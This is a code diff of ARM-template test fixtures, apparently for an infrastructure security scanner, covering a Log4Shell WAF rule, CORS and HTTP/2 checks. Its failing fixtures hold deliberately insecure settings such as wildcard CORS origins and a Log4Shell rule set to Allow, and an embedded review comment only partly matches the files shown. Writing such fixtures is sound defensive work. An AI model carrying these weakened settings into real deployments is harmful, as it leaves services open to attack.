"properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": "bool", + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + 
}, + "minimumTlsVersionAllowed": "string", + "publicNetworkAccess": "Disabled" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json new file mode 100644 index 00000000000..273a09469de --- /dev/null +++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json @@ -0,0 +1,13 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies", + "apiVersion": "2019-09-01", + "name": "fail1", + "location": "[resourceGroup().location]", + "properties": {} + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json new file mode 100644 index 00000000000..5e67ac71751 --- /dev/null +++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json @@ -0,0 +1,33 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies", + "apiVersion": "2019-09-01", + "name": "fail3", + "location": "[resourceGroup().location]", + "properties": { + "managedRules": { + "managedRuleSets": [ + { + "ruleSetType": "Microsoft_DefaultRuleSet", + "ruleSetVersion": "1.1", + "ruleGroupOverrides": [ + { + "ruleGroupName": "JAVA", + "rules": [ + { + "action": "Block", + "ruleId": "944240" + } + ] + } + ] + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json new file mode 100644 index 00000000000..eb96a898ef6 --- /dev/null 
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+ "apiVersion": "2019-09-01",
+ "name": "fail4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "managedRules": {
+ "managedRuleSets": [
+ {
+ "ruleSetType": "Microsoft_DefaultRuleSet",
+ "ruleSetVersion": "1.1",
+ "ruleGroupOverrides": [
+ {
+ "ruleGroupName": "JAVA",
+ "rules": [
+ {
+ "action": "Allow",
+ "ruleId": "944240",
+ "enabledState": "Enabled"
+ }
+ ]
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json
new file mode 100644
index 00000000000..3341bf6fbf7
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+ "apiVersion": "2019-09-01",
+ "name": "pass1",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "managedRules": {
+ "managedRuleSets": [
+ {
+ "ruleSetType": "Microsoft_DefaultRuleSet",
+ "ruleSetVersion": "1.1"
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json
new file mode 100644
index 00000000000..dd79be6936b
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+ "apiVersion": "2019-09-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "managedRules": {
+ "managedRuleSets": [
+ {
+ "ruleSetType": "DefaultRuleSet",
+ "ruleSetVersion": "1.0"
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json
new file mode 100644
index 00000000000..93096e7e8b6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+ "apiVersion": "2019-09-01",
+ "name": "pass3",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "managedRules": {
+ "managedRuleSets": [
+ {
+ "ruleSetType": "Microsoft_DefaultRuleSet",
+ "ruleSetVersion": "1.1",
+ "ruleGroupOverrides": [
+ {
+ "ruleGroupName": "JAVA",
+ "rules": [
+ {
+ "action": "Block",
+ "ruleId": "944240",
+ "enabledState": "Enabled"
+ }
+ ]
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json
new file mode 100644
index 00000000000..6a924d4c600
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+ "apiVersion": "2019-09-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "managedRules": {
+ "managedRuleSets": [
+ {
+ "ruleSetType": "Microsoft_DefaultRuleSet",
+ "ruleSetVersion": "1.1",
+ "ruleGroupOverrides": [
+ {
+ "ruleGroupName": "JAVA",
+ "rules": [
+ {
+ "action": "Redirect",
+ "ruleId": "944240",
+ "enabledState": "Enabled"
+ }
+ ]
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
new file mode 100644
index 00000000000..a1c52a80fe6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
@@ -0,0 +1,81 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "fail", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]", + "siteConfig": { + "appSettings": [ + { + "name": "Setting1", + "value": "Value1" + }, + { + "name": "Setting2", + "value": "Value2" + } + ], + "metadata": [ + { + "name": "Key1", + "value": "Value1" + }, + { + "name": "Key2", + "value": "Value2" + } + ], + "cors": { + "allowedOrigins": ["*"] + } + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json new file mode 100644 index 00000000000..d4db5386dc0 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json 
@@ -0,0 +1,56 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "pass", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json new file mode 100644 index 00000000000..89588498bbb --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json 
@@ -0,0 +1,81 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "siteName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Web App." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "The Azure region where the resource should be deployed." + } + }, + "sku": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Shared", + "Basic", + "Standard", + "Premium" + ], + "metadata": { + "description": "The pricing tier of the Azure Web App." + } + }, + "appServicePlanName": { + "type": "string", + "metadata": { + "description": "The name of the App Service Plan to use." + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2019-08-01", + "name": "pass_with_cors", + "location": "[parameters('location')]", + "properties": { + "name": "[parameters('siteName')]", + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]", + "siteConfig": { + "appSettings": [ + { + "name": "Setting1", + "value": "Value1" + }, + { + "name": "Setting2", + "value": "Value2" + } + ], + "metadata": [ + { + "name": "Key1", + "value": "Value1" + }, + { + "name": "Key2", + "value": "Value2" + } + ], + "cors": { + "allowedOrigins": ["192.0.0.1"] + } + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]" + ], + "sku": { + "name": "[parameters('sku')]" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json new file mode 100644 index 00000000000..fda341efc0e --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json 
@@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + 
"exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": 
"string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json new file mode 100644 index 00000000000..64592e64706 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json 
@@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": 
"string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": false, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + 
"vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json new file mode 100644 index 00000000000..69b2c86f385 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json 
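Review bot: The `keyType` parameter in this fixture declares `"defaultValue": "RSA"` while its `allowedValues` list is only `EC`, `EC-HSM`, `RSA-HSM`, so as written the template would be rejected by ARM parameter validation; pass.json includes `"RSA"` in that list and pass2.json repeats the omission. Checkov presumably does not validate parameter defaults, so this is a fixture-quality point rather than a test failure, but adding `"RSA",` to the list (or dropping the Key Vault `parameters` and `outputs` blocks, which have nothing to do with the site resource) keeps the fixtures deployable. More generally the ~370-line template hides that the only difference from pass.json is `"http20Enabled": false`; a minimal fixture in the style of example_FunctionAppMinTLSVersion would make the intent readable at a glance.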
@@ -0,0 +1,374 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
